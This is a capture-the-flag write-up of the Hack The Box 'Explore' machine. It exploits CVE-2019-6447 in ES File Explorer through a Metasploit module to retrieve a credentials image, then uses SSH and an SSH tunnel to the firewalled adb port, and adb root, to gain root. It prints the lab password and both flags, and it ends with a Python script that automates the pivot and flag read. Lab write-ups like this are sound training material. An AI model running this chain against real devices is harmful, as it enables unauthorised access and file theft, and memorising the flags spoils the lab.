
HTB:Explore[WriteUP]

Contents

Connect to the HTB server and start the target machine

1.Which port is being used by the ES File Explorer application?

Full port scan of the target with nmap

2.What 2019 CVE ID is ES File Explorer vulnerable to?

3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.

4.What is the password for user kristi on the box?

5.Submit the flag located in /storage/emulated/0/.

USER_FLAG:f32017174c7c7e8f50c6da52891ae250

6.Which port is being filtered by the firewall?

7.What is the standard Google-provided command line tool for interacting with Android debug?

8.Submit the flag located in /data/.

ROOT_FLAG:f04fc82b6d49b41c9b08982be59338c5


Connect to the HTB server and start the target machine

Target IP: 10.10.10.247

Assigned IP: 10.10.16.7


1.Which port is being used by the ES File Explorer application?

Full port scan of the target with nmap (-p- covers all 65535 TCP ports, -A adds version detection and the default scripts)

nmap -p- -A 10.10.10.247

The scan attributes port 42135 to ES File Explorer as well, and submitting 42135 is not accepted. The expected answer is 59777: that is the port on which the application's HTTP/JSON command interface listens, the one CVE-2019-6447 and the Metasploit module used below target (the module's output later in this writeup reports the host as 10.10.10.247:59777). The same scan also shows SSH on 2222 and port 5555 as filtered; both come up again in later steps.


2.What 2019 CVE ID is ES File Explorer vulnerable to?

Search for ES File Explorer with searchsploit

searchsploit ES File Explorer

Copy the exploit into the current directory

searchsploit -m 50070.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 50070.py     
  Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/50070
     Path: /usr/share/exploitdb/exploits/android/remote/50070.py
    Codes: CVE-2019-6447
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/50070.py

The vulnerability is CVE-2019-6447 (the Codes field of the searchsploit entry).


3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.

Start Metasploit

msfconsole

Search for modules related to ES File Explorer

search ES File Explorer

The module's full path: auxiliary/scanner/http/es_file_explorer_open_port


4.What is the password for user kristi on the box?

Select the module

use auxiliary/scanner/http/es_file_explorer_open_port

List the module's options

show options

List the module's available actions

show actions

Set the action to LISTPICS to list every picture on the device (RHOSTS must point at the target; RPORT already defaults to 59777)

set action LISTPICS

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action LISTPICS
action => LISTPICS
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

[+] 10.10.10.247:59777   
  concept.jpg (135.33 KB) - 4/21/21 02:38:08 AM: /storage/emulated/0/DCIM/concept.jpg
  anc.png (6.24 KB) - 4/21/21 02:37:50 AM: /storage/emulated/0/DCIM/anc.png
  creds.jpg (1.14 MB) - 4/21/21 02:38:18 AM: /storage/emulated/0/DCIM/creds.jpg
  224_anc.png (124.88 KB) - 4/21/21 02:37:21 AM: /storage/emulated/0/DCIM/224_anc.png

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Retrieve the file /storage/emulated/0/DCIM/creds.jpg with the GETFILE action (ACTIONITEM holds the device path to fetch):

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action GETFILE
action => GETFILE
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set ACTIONITEM /storage/emulated/0/DCIM/creds.jpg
ACTIONITEM => /storage/emulated/0/DCIM/creds.jpg
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

[+] 10.10.10.247:59777   - /storage/emulated/0/DCIM/creds.jpg saved to /root/.msf4/loot/20241110084132_default_10.10.10.247_getFile_945793.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Opening the downloaded image (saved under /root/.msf4/loot/) shows the credentials:

Username: kristi

Password: Kr1sT!5h@Rp3xPl0r3!


5.Submit the flag located in /storage/emulated/0/.

Log in over SSH with the credentials above (SSH is on port 2222, not 22; if the login is rejected, check the password, especially the letter case). -o HostKeyAlgorithms=+ssh-rsa is needed because the server only offers an ssh-rsa host key, which current OpenSSH clients disable by default.

sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa
Password authentication
:/ $ whoami
u0_a76

The shell runs as u0_a76, an Android app UID (the SSH daemon is an ordinary app, not root), which is why the user flag under the shared storage is readable but /data will not be. Change into /storage/emulated/0/

cd /storage/emulated/0/

Read user.txt

cat user.txt

:/ $ cd /storage/emulated/0/
:/storage/emulated/0 $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/storage/emulated/0 $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

USER_FLAG:f32017174c7c7e8f50c6da52891ae250


6.Which port is being filtered by the firewall?

Check the target's listening sockets from the SSH shell

ss -tlnp

The nmap scan at the start already answers this: port 5555 (adbd) shows as filtered, meaning the firewall drops probes to it from outside rather than the port being closed. The service is still reachable on the target's own loopback, which the SSH port forward in step 8 takes advantage of.


7.What is the standard Google-provided command line tool for interacting with Android debug?

The standard Google-provided command line tool for talking to Android's debug interface is ADB (Android Debug Bridge). It lets a developer drive an Android device from a computer over the command line: install and uninstall apps, query device information, push and pull files between the device and the computer, and open a shell on the device.


8.Submit the flag located in /data/.

Forward the target's port 5555 to local port 6666 over SSH (-N opens no remote shell, -L binds the local port; the forwarded connection reaches adbd via the target's loopback, so the firewall rule on 5555 does not apply)

sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa -N -L 6666:localhost:5555

Connect adb to the forwarded port

adb connect 127.0.0.1:6666

List the connected devices (the state column should read "device", not "offline" or "unauthorized")

adb devices

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# adb devices               
List of devices attached
127.0.0.1:6666  device
emulator-5554   device

Restart adbd on the device as root (more than one device is attached, so select the target with -s; this succeeds because the box runs a debuggable Android build, production builds refuse with "adbd cannot run as root in production builds")

adb -s 127.0.0.1:6666 root

Open a shell on the device (adbd restarts after the root command, so if the session drops, run adb connect 127.0.0.1:6666 again first)

adb -s 127.0.0.1:6666 shell

Locate root.txt under /data and read it; as root the directory is readable, unlike from the u0_a76 SSH session.

ROOT_FLAG:f04fc82b6d49b41c9b08982be59338c5
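The chain in steps 6 to 8 (tunnel, connect, check the device state, adb root, shell) as one checked Python script. This is an added example, not the page's own commands; it assumes sshpass, ssh and adb on the attacking host, the SSH service on port 2222 accepting kristi's password, local port 6666 free, a debuggable Android build (adb root fails on production builds) and the flag at /data/root.txt as the question implies. The sample adb devices output is constructed; only the argv builder and the output parsers run without a target.

```python
#!/usr/bin/env python3
"""Reach the firewalled adbd (5555) through the SSH foothold and read /data/root.txt.

Added example, not the page's code. Assumes sshpass/ssh/adb locally, SSH on
target port 2222 with the recovered password, local port 6666 free, a
debuggable Android build (`adb root` is refused on production builds) and the
flag at /data/root.txt. SAMPLE_DEVICES is constructed; only the pure helpers
(argv builder, output parsers) run offline.
"""
import subprocess
import time

# Constructed `adb devices` output in the shape the writeup shows.
SAMPLE_DEVICES = "List of devices attached\n127.0.0.1:6666\tdevice\nemulator-5554\tdevice\n"


def ssh_forward_argv(user, host, password, ssh_port=2222, local_port=6666, remote_port=5555):
    """Command line for the tunnel. -N: no remote shell; -L: local forward;
    ExitOnForwardFailure makes ssh exit instead of idling without a tunnel
    when local_port is already bound."""
    return [
        "sshpass", "-p", password,
        "ssh", "-p", str(ssh_port), f"{user}@{host}",
        "-o", "HostKeyAlgorithms=+ssh-rsa",      # server only offers an ssh-rsa host key
        "-o", "ExitOnForwardFailure=yes",
        "-N", "-L", f"{local_port}:localhost:{remote_port}",
    ]


def adb_device_state(devices_output, serial):
    """State column for `serial` in `adb devices` output
    (device / offline / unauthorized), or None if the serial is absent."""
    for line in devices_output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == serial:
            return parts[1]
    return None


def adb_root_succeeded(root_output):
    """`adb root` prints 'restarting adbd as root' (or 'adbd is already running
    as root') on debuggable builds and 'adbd cannot run as root in production
    builds' otherwise."""
    text = root_output.strip().lower()
    return text.startswith("restarting adbd as root") or "already running as root" in text


def _run(argv, timeout=60):
    res = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return res.stdout + res.stderr


def pivot_read_flag(user, host, password, local_port=6666, flag_path="/data/root.txt"):
    """Bring up the tunnel, attach adb through it, escalate adbd and read the flag."""
    serial = f"127.0.0.1:{local_port}"
    tunnel = subprocess.Popen(ssh_forward_argv(user, host, password, local_port=local_port),
                              stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    try:
        time.sleep(3)                       # give the tunnel time to come up
        if tunnel.poll() is not None:
            raise RuntimeError("ssh exited early: wrong password or local port in use")
        _run(["adb", "connect", serial])
        state = adb_device_state(_run(["adb", "devices"]), serial)
        if state != "device":
            raise RuntimeError(f"adb sees {serial} as {state!r}, expected 'device'")
        if not adb_root_succeeded(_run(["adb", "-s", serial, "root"])):
            raise RuntimeError("adbd refused to restart as root (production build?)")
        time.sleep(2)
        _run(["adb", "connect", serial])    # adbd restarted, the TCP session was dropped
        return _run(["adb", "-s", serial, "shell", "cat", flag_path]).strip()
    finally:
        tunnel.terminate()
        _run(["adb", "disconnect", serial])


if __name__ == "__main__":
    print(pivot_read_flag("kristi", "10.10.10.247", "Kr1sT!5h@Rp3xPl0r3!"))
```

Each step fails loudly on the condition that actually breaks it in practice: ssh dying because 6666 is taken, adb reporting the forwarded serial as offline or unauthorized, or adbd refusing to restart as root, rather than discovering at the final cat that the shell is still an unprivileged app UID.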
